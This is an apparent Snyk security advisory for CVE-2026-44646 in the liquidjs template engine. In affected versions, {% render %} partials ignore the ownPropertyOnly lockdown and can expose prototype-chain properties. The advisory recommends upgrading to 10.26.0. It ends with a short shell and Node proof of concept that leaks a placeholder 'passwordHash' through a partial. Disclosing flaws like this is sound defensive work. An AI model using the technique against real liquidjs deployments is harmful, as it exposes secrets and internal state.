Insecure Default Initialization of Resource Affecting liquidjs package, versions <10.26.0
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-LIQUIDJS-16887887
- published27 May 2026
- disclosed27 May 2026
- creditoffset
Introduced: 27 May 2026
NewCVE-2026-44646 (opens in a new tab)How to fix?
Upgrade liquidjs to version 10.26.0 or higher.
Overview
liquidjs is an A simple, expressive, safe and Shopify compatible template engine in pure JavaScript.
Affected versions of this package are vulnerable to Insecure Default Initialization of Resource in the Context.spawn function. An attacker can access prototype-chain properties of objects passed into a {% render %} partial by supplying crafted templates that exploit the lack of propagation of the ownPropertyOnly setting. This allows reading sensitive information, such as secrets or internal state, from within partial templates even when per-render lockdowns are intended.
PoC
mkdir -p /tmp/render-poc
printf '{{ user.passwordHash }}' > /tmp/render-poc/_user.liquid
node -e "
const { Liquid } = require('./dist/liquid.node.js');
const liquid = new Liquid({ ownPropertyOnly: false, root: '/tmp/render-poc' });
class User { constructor(n){ this.name = n; } }
User.prototype.passwordHash = 'bcrypt\$secret';
const u = new User('alice');
liquid.parseAndRender(
'Direct:[{{ user.passwordHash }}] Render:[{% render \"_user.liquid\", user: user %}]',
{ user: u },
{ ownPropertyOnly: true }
).then(console.log);
"